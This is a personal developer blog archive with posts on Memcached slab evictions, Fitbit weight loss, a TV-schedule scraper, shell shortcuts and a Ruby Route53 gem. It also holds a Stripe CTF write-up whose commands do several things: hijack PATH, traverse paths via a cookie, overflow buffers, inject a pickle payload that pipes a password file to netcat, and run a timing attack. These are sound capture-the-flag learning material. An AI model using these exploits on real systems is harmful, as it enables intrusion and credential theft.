February 03, 2014

Memcached Doesn't Work the Way You Think It Does

A coworker strolled over to my desk late on a Thursday afternoon and casually mentioned that one of our internal tools was unresponsive. On investigation I discovered that the box was getting hammered with requests, under normal circumstances this machines receives 1 RPM (requests/minute) but was currently receiving 1200 RPM.


In this case we started looking at our caching code and the Memcached pool. There were no graphs or alerts that showed anything odd. In our case each Memcached instance was configured to use 4Gb of memory but only 1Gb of memory was being used according to Memcached’s internal bytes statistic. The large number of requests pointed to an empty cache, but nothing in the code indicated what could be causing it. So we ran a few tests and found some troubling results.


>> Rails.cache.write("phil_test_key", JSON.parse(result.http_response.body), :expires_in => 1.day)
=> true
>> 100.times do |i|
?>   break if Rails.cache.read("phil_test_key", :raw => true).nil?
>>   puts "#{i} seconds"
>>   sleep 1
>> end
0 seconds
1 seconds
...
12 seconds
13 seconds
=> nil


The object we were storing after parsing the JSON and marshalling was roughly 28K. When we decreased the size of the object to 25K the problem disappeared. When we increased the size to 33K the problem disappeared. The quick and dirty solution therefore was to add 5K of junk data to the service response which solved our problem for the moment. But this exposed a misunderstanding on how Memcached was working behind the scenes and a problem with how we were monitoring our caching infrastructure.


I knew our clients used hashed key names to determine which Memcached server to store the value in. But to me Memcached was just a big non-persistent key-value store with expirations. For me and most of my coworkers we treated Memcached like the following figure.


[Figure 1: Memcached Naive Understanding ]


How Memcached actually works is more complex than that, and once we understood the mechanics underneath it quickly highlighted our problem. There are three key components that one needs to understand in order to grasp the issue:
  • Pages: By default 1 page == 1Mb of Memcached memory. Pages are available for allocation to slabs but once they have been allocated to a slab they can't be allocated to another slab later.
  • Slabs: Each page is assigned to a slab class. A slab class has a range of data-sizes that it's responsible for storing. For example if I have some data that's 28K in size it would be stored within a slab that handles data sizes between 25K and 33K. (Exact Sizes Dependent on Configuration)
  • Chunks: Each individual value is stored within a single chunk. A single slab is made up of these chunks. If 28K of data is stored in a chunk within the slab that handles data up to 33K in size, the remaining 5K is wasted.
   
In the figure below we show a Memcached host configured to run with 8 Mb of memory, and of which 2 Mb has already been allocated.


[ Figure 2: Memcached Host and Page Allocation ]


The figure below represents a single page which has been assigned to a slab. Within it are allocated chunks which each contain some data.


[ Figure 3: A Single Allocated Page with Allocated Chunks ]


The figure below represents a single chunk.


[ Figure 4: A Single Chunk of Data ]


In our case, all the pages had been allocated to slabs in our Memcached instance. However since pages are never reallocated we effectively had a cache where we had plenty of free space for values of some types but not others resulting in evictions. While an expiration is expected and often a useful tool for keeping data fresh. Evictions are when data is removed from the data store before it has expired and is unexpected.


When our app tried to store a 28K object, Memcached found the least recently used object in that slab, and removed it from the store. With sufficient traffic of a particular size of data we started seeing rapid evictions. Because our data was repeatedly being evicted the service responsible for generating that data was getting slammed with requests and couldn’t keep up with the heavier load.


While we had already mitigated our initial problem this highlighted a much bigger issue, thousands of evictions per minute. Resulting in constant cache misses and slower performance. We restarted the Memcached instances in this pool late at night which allowed the pages to be reallocated. Here's a graph over time illustrating the drop in response time for a particular API call. As you can see it was pretty substantial.


[ Figure 5: API Response Time ]


Long term we're looking at Twemcache, a fork of Memcached, which allows more fine-grained eviction control which should keep our page allocation in balance going forward. For now we're keeping a much closer eye on our eviction rate and alerting on anything over 0.


Philip Corliss is a Cheese Enthusiast and wrote this blog post while a Software Developer at Groupon. He’s no longer working for Groupon but still loves to talk about caching and scaling problems. For cheese recommendations, adorable corgi photos, and questions please email pcorliss@gmail.com or tweet @pcorliss.


January 27, 2014

Fitbit Data and Weightloss

I was always a fat kid, later on I was a fat teenager, and no real surprise I was a fat adult. I’ve always struggled with food, exercise, and my appearance. Food was a comfort, I used it to de-stress and I ate when I was bored. Exercise was to be avoided because I sweat excessively. I’ve dieted before, and gone on short exercise stints, but nothing that lasted more than a few months.


About a year ago I got a bit more serious, I started a regular appointment with a personal trainer. She taught me how to lift weights, pace my workouts, and got me on a good track such that I could exercise on my own. The foundation was there, I had lost 15 pounds from 240 lbs, and I had developed some core strength. I didn’t keep it up though.


In early May I pre-ordered the Fitbit Flex. Some friends of mine had earlier versions already but I figured it might be worth it. I was worried though, I have a long history of gadget based exercise incentives. WiiFit, Pull up Bars, Hundred Push Ups, etc…


After the Fitbit arrived, I strapped it on and really got into the distance based goal approach. Movement around the office plus my walk to and from work usually netted me 4 miles but I needed to do supplementary exercise in order to get that last mile. Because the daily goal was there I started spending a lot more time in the gym. Once or twice a week suddenly jumped up to 5-6 days a week.


My weekly plan consisted of 2-3 days of weight-lifting with a 10 minute warmup on the treadmill. Then rest days where I would do a intervals, or treadmill hill climbs. I went from only being able to run a 10 minute mile to a 7:20 minute mile. I started running for longer distances on the treadmill, at first 2 miles, then 3, 5, and in the last three months I’ve been running 6-10 miles outdoors.


I cut out soda except for a treat every 2-4 weeks, and tried to snack less. At first this worked wonders but around November I had to start cutting calories to see the same weight loss that I was seeing in previous months.


A couple of setbacks along the way, I’ve been getting nagging left-knee pain throughout November and December. The last few weeks I’ve been using the stationary bike exclusively to try and reduce the impact and let my knee recover. I’ve also noticed that I’m aware of a constantly shifting array of muscle aches and pains induced by weight-lifting.


On the positive side I’m in the best shape of my life. This morning I weighed in at 196 lbs. I’ve been below 200 lbs, my goal weight, for over a week now. This is down from 226 lbs. at the end of May.


Processed via the Fitbit API and a quick script I put together.


The effects are noticeable, I look better in the mirror, fat has given way to muscle, and the excessive sweating seems to have eased off. I’ve lost about 4 inches around my waist line. I’ve given up x-large t-shirts in favor or large t-shirts. I'll need to pick up some more pants at the very least as they're starting to look comical on me.


I plan to lose about 5-10 more pounds, then take a break for a while and go on a maintenance plan. Afterwards I may start weightlifting more seriously in an effort to add more lean muscle. My scale claims I’ve only lost about 2-3 lbs of lean muscle during this period. But I’m not sure I trust the accuracy of the electronic impedance testing on a $20 scale.

January 20, 2014

Law & Order

About two years ago I was on an exchange program with another team at Groupon. I flew out to Palo Alto, checked in to my hotel, and spent two-weeks working with another team. It was an interesting experience. I learned a lot, committed some code, and made a big impact. At the end I came back to Chicago more knowledgeable about Groupon’s core systems.

There was a lot of down-time during those two weeks. I ended up watching a lot of cable TV. What I found was that for me the most comforting show on television was Law & Order. At most times day or night I could find a channel playing one of the many varieties of the show. For whatever reason it helped me relax and decompress a bit knowing that it was a near-constant. The only problem was finding the right channel.

Thus was born WhatTimeIsLawAndOrderOn.com. I started off by scraping a site which I won’t name for obvious reasons. Then loaded the data into nokogiri and developed a series of rules for parsing the data. After an evening I had something mostly working. After another day I had a domain, a basic design, and an S3 bucket with mirrors of the content.

I had planned to run a regular rake task to keep the data updated but never got around to it. But now with “Funemployment” in full swing I figured it was time to dust it off and make it properly functional. With some modifications to the encoding and feed parsing that took most of the day it’s now running on heroku and if the scheduled job runs as expected it should stay up to date.

Another nifty feature is that by scraping all of the tv schedule I can spin off dozens of other domains for many different shows. If the traffic is high enough I might just be able to cover the costs of buying more domains and hosting with some basic ads.

A bit of a silly thing to get started with for my first full week of Funemployment. But cleaning up some of my old projects seemed like a nice way to spend some time.

February 28, 2012

Stripe CTF

Code is available at https://github.com/pcorliss/Stripe-CTF

My solutions to the Stripe CTF challenge are as follows.

Note that in many cases the code isn't very robust or workable. But was
the minimum needed to complete the level.

Level 01

On observing that the system call within level01.c made an unchecked
call to 'date' without a full path specified I created a local date
file and set it to the local path. That file was simple shell script
containing 'cat /home/level02/.password'.

level01@ctf:/tmp/tmp.8N0qqvoaVu$ export PATH=/tmp/tmp.8N0qqvoaVu:$PATH
level01@ctf:/tmp/tmp.8N0qqvoaVu$ chmod a+x date
level01@ctf:/tmp/tmp.8N0qqvoaVu$ /levels/level01
Current time: kxlVXUvzv

Level 02

Level 2 uses the contents of the clients cookie to read a file without
escaping the contents. Via a browser I modified the cookie set by the
level to the following and the password was printed as part of the web
page.

Change cookie to ../../home/level03/.password
Or0m4UX07b

Level 03

I had never performed any sort of pointer arithmatic outside of an
introductory CS course. So this was certainly a challenge for me.
Outside of level 6 I think I spent more time on this level than any of
the other ones.

On reading level 3's source code I noticed that it was executing the
function via an array of function pointers. However the selection
mechanism used an argument which only checked for positive numbers >= 3
and not for number < 0.

After spending more time with it and gdb I realized you could select a negative
number which pointed to a specific location in the string buffer you
pass as an argument as well. After some fiddling I provided the memory
address of the deprected run function.

level03@ctf4:/tmp/tmp.uuCAtV5Uog$ /levels/level03 -21 'cat /home/level04/.password;'$'\x5b'$'\x87'$'\x04'$'\x08'
i5cBbPvPCpcP
sh: [: not found

Level 04

Like Level 03 I had never performed a buffer overflow before. I did some
searching and came across the following which amounts to a buffer
overflows for dummies
. With some tweaking I was
able to make it work for the level 4 binary. It works about 50% of the
time. From what I understand Linux uses some sort of stack randomization
to prevent this sort of attack. From reading other reports online there
is a way to get a dterministic solution but I didn't take the time to
expore that.

Offset:-994Address: 0xffa368fe
Executing
Buffer:57200
Buffer:0
$
$ whoami
level05
$ cat /home/level05/.password
fzfDGnSmd317

Level 05

After looking at the python web server and running it locally. I noticed
that it wasn't properly escaping user input and allowed a file
containing executable code to be written to. I pickled up a simple
exploit, started a netcat server listening and passed it through.

level05@ctf4:/tmp/tmp.7mKxYf6M1c$ nc -l 9333 &
[1] 24599
level05@ctf4:/tmp/tmp.7mKxYf6M1c$
level05@ctf4:/tmp/tmp.7mKxYf6M1c$ curl localhost:9020 -d "DATA; job: cos
system
(S'nc localhost 9333 < /home/level06/.password'
tR.'
tR.
"
SF2w8qU1QDj
{
"result": "Job timed out"
}
[1]+ Done nc -l 9333

Level 06

Of all the challenges this one
took the most time. I had heard of and felt I understood the
implementation of a timing attack but had no idea how hard it would be
to actually implement.

First I tried something written in ruby to test the time taken to run
the command, however I saw very little difference in how fast something
failed. Given that I was initially testing for the difference between 1
variable check and two and the precision of the ruby clock was only in
nanoseconds this failed right away.

Then I tried an implementation that already existed online simply to
see if they could work given that many of the servers were under heavy
load and actively running out of forks. But even the supposed solution
above failed to work for me as it seems to depend on the binary forking
and reporting failure almost immediately which I wasn't even able to
replicate locally.

Finally I settled on passing very large arguments to slow down the
evaluation, similar to the solution above. Then timed each char read in
microseconds via a small c program. The fork operation takes slightly
longer to run than a normal character check and therefore with
microsecond precision you can determine where the failure occurred.

This solution worked perfectly for me locally but I had to tune it on
stripe's servers in order to get it to work. I'm not sure if I was
reading the buffer incorrectly, the machine was overloaded or if my code
just runs in a way that I'm not expecting. Either way with some fine
tuning and extra sanity checks I was able to get it to run against the password file
and produce the answer.

level06@ctf5:/tmp/tmp.2eCZvV2CuJ$ ruby ruby_wrapper.rb
Suffix: 130772
{"t"=>4}
Answer: t
{"h"=>5}
Answer: th
{"e"=>5}
Answer: the
{"f"=>4}
Answer: thef
{"l"=>5}
Answer: thefl
{"a"=>5}
Answer: thefla
{"g"=>5}
Answer: theflag
{"l"=>5}
Answer: theflagl
{"0"=>4}
Answer: theflagl0
{"e"=>4}
Answer: theflagl0e
{"F"=>4}
Answer: theflagl0eF
{"T"=>5}
Answer: theflagl0eFT
{"t"=>5}
Answer: theflagl0eFTt
{"I"=>1, "T"=>5}
Answer: theflagl0eFTtT
{"5"=>5}
Answer: theflagl0eFTtT5
{"o"=>5}
Answer: theflagl0eFTtT5o
{"i"=>5}
Answer: theflagl0eFTtT5oi
{"0"=>4}
Answer: theflagl0eFTtT5oi0
{"n"=>5, "r"=>1}
Answer: theflagl0eFTtT5oi0n
{"O"=>5}
Answer: theflagl0eFTtT5oi0nO
{"T"=>5}
Answer: theflagl0eFTtT5oi0nOT
{"x"=>5, "e"=>1}
Answer: theflagl0eFTtT5oi0nOTx
{"O"=>5}
Answer: theflagl0eFTtT5oi0nOTxO
{"5"=>5}
Answer: theflagl0eFTtT5oi0nOTxO5
{}
Answer: theflagl0eFTtT5oi0nOTxO5

level06@ctf5:/tmp/tmp.2eCZvV2CuJ$ /levels/level06 /home/the-flag/.password theflagl0eFTtT5oi0nOTxO5
Welcome to the password checker!
........................
Wait, how did you know that the password was theflagl0eFTtT5oi0nOTxO5?

The Flag

You're able to login as the flag user but I couldn't find anything
special or a secret next level. Perhaps I didn't look hard enough?

the-flag@ctf5:/tmp/tmp.qCU4Sz2RhR$

August 30, 2011

Lightning Talk - Geekfest

As part of Geekfest, a weekly chicago area meetup I gave a 5-minute lightning talk on some basic command line shortcuts. My outline and the commands are below.

#Introduction
#I'm Philip Corliss a Software Developer here at Groupon, while pairing and my partner is using the keyboard I'll often throw out requests for them to tab-complete, pipe to grep, or ESC-. They usually look at me like I'm crazy. This talk is designed to quickly outline a common scenario of parsing a log file or some other formatted file.

#What's this file
ls

#Whoah, watch this, if you're not familiar with tab completion you should be, it will make your life ridiculously easy. I for one can only spell the first three letters of most words at this point
less post....

#Lets take a look, binary huh? weird
less postal_codes.csv.gz

#Oh yea it's a gzip file, meaning it's compressed we could decompress it, but for this example lets pretend this compressed file is 1Gb and a 1:10 compression ratio that's 10Gb of data, we don't want to wait for that. So lets just look at it inline. Way faster
gzip ...

#Decompresses directly to STDOUT, great for working with the file
gzip -dc postal_codes.csv.gz

#Whoa, too much data, that doesn't really help us
^C

#What's that, it's a Pipe, it pipes stdout from one program to another
gzip -dc postal_codes.csv.gz |

#First 15 lines then it exits, no extra resources or IO consumed and we get a quick sample of data
gzip -dc postal_codes.csv.gz | head -15

#Lets cut this up alternative syntax in awk for multi-char delimeters awk -F'|' '{ print $3 ":" $4}'
gzip -dc postal_codes.csv.gz | head -15 | cut -d'|' -f3,4

#Lets sort it, get the unique values and count them and then sort numerically the results
gzip -dc postal_codes.csv.gz | head -15 | cut -d'|' -f3,4 | sort | uniq -c | sort -n

#Top 30 city/province pairs for canadian zipcodes, it takes some time so we'll cache it to a file
gzip -dc postal_codes.csv.gz | head -15 | cut -d'|' -f3,4 | sort | uniq -c | sort -n | tail -30

#Lets see how long it takes, and lets write it to a file
time gzip -dc postal_codes.csv.gz | cut -d'|' -f3,4 | sort | uniq -c | sort -n > ~/my_sweet_report.txt

#Use ESC-. to bring up last arg
less ~/my_sweet_report.txt 

May 30, 2011

Route53 Updated

I've just updated the route53 gem to support Amazon's latest additions including weighted resource record sets as well as zone apex support allowing assignment of ELB instances to roots of domains. It's like allowing a CNAME of the naked domain to an ELB instance which was previously unavailable to folks using EC2.

This is probably the most successful tool I've put together to date. With 75 watchers and 10 forks on github as well as over 2000 downloads and counting from rubygems. I look forwarding to continue improving the project and keeping up with the new features as Amazon releases them.

https://github.com/pcorliss/ruby_route_53

May 28, 2011

Quick Update

It's been a while since I last posted. I decided talking about a job search while it was in progress was probably a bad move. After I finally got hired I found it more and more difficult to come home at night after a long commute and spend time working on my own projects. But after a recent move which significantly reduces my commute I'm ready to jump back in.

For those interested I started working as a Software Developer at Groupon in late January and I've been doing well. I turned down some great offers and interviews but in the end Groupon seemed to offer the biggest challenge. And in the lawyers made me say it category, while I do work for Groupon my opinions are my own as well as the code that I develop outside of the office.

Expect a new post about some upgrades to the route 53 gem to support some newly released features. As well as an rspec patch I put together to support running multiple specs via line ranges.